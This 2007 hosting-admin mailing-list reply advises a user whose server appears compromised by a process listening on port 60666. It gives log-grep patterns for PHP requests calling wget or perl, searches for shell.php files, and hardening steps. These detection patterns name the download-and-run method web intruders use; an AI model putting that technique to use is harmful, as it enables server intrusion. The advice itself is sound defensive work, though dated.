Article 9541 at 07/04/13 00:59:07 From: kenmarcus (at mark) precisionweb.net Subject: [coba-e:09541] Re: machine possibly compramised

Index: [Article Count Order] [Thread]
Date:  Thu, 12 Apr 2007 08:58:44 -0700
From:  "Ken Marcus - Precision Web Hosting, Inc." <kenmarcus (at mark) precisionweb.net>
Subject:  [coba-e:09541] Re: machine possibly compramised
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <040801c77d1b$76282580$6700a8c0@OfficeKen>
References:  <bb9e5a970704111706o4ffa7945k2576dc377478750d (at mark) mail.gmail.com>
X-Mail-Count: 09541


----- Original Message ----- 
From: "dnk" <d.k.emaillists (at mark) gmail.com>
To: "BQ List" <coba-e (at mark) bluequartz.org>
Sent: Wednesday, April 11, 2007 5:06 PM
Subject: [coba-e:09532] machine possibly compramised


> Hi there has any one seen this before?
>
> We have a BQ (Nuonce) yummed up to todays date.
>
> We started noticing a funny process running. It is running as ./a
> under the apache user. it seems to open up port 60666 and listen on
> it. Our firewall is keeping that port locked up though other wise and
> it seems like this hack can't get past this point. We cleaned it out a
> few days ago, and well obviously since I am posting it has appeared
> again. We suspect it must be some code being launched through either
> perl or php and praying it is not through the BQ itself), but was
> hoping for the "hail mary" from the list in case someone has had
> simlar experience.
>
>
> Thanks in advance!
>
> dk
>

You might check to see if you have any old version phpbb scripts on your 
server.
locate docs/CHANGELOG.html

You might check the log files:
cat /var/log/httpd/access_log | grep php | grep wget
cat /var/log/httpd/access_log | grep php | grep perl

You could check your user dirs for shell.php type files:
ls -la /home/sites/*.*/users/*/web | grep php
ls -la /home/sites/*.*/users/*/web | grep cgi
ls -la /home/sites/*.*/users/*/web | grep pl


For the future, a few things you might change the following:
1. proftpd.conf

Within my proftpd.conf <global> section, I always add:
<Limit LOGIN>
    DenyAll
   AllowGroup site-adm
   AllowUser  admin
</Limit>

That stops uploads by non-admin users. Otherwise someone will guess the 
password of the, for example, user alex  with password of alex, and they 
will upload to the user directory and run their scripts from there.


2. you might change the PHP to run in safe mode.

3. chmod 700 /usr/bin/wget

4.  chmod 400  /usr/bin/gcc

5. Set the /tmp parition to not allow execution of scripts (although it is 
pretty easy to get around that)

----
Ken Marcus
Precision Web Hosting, Inc.
http://www.precisionweb.net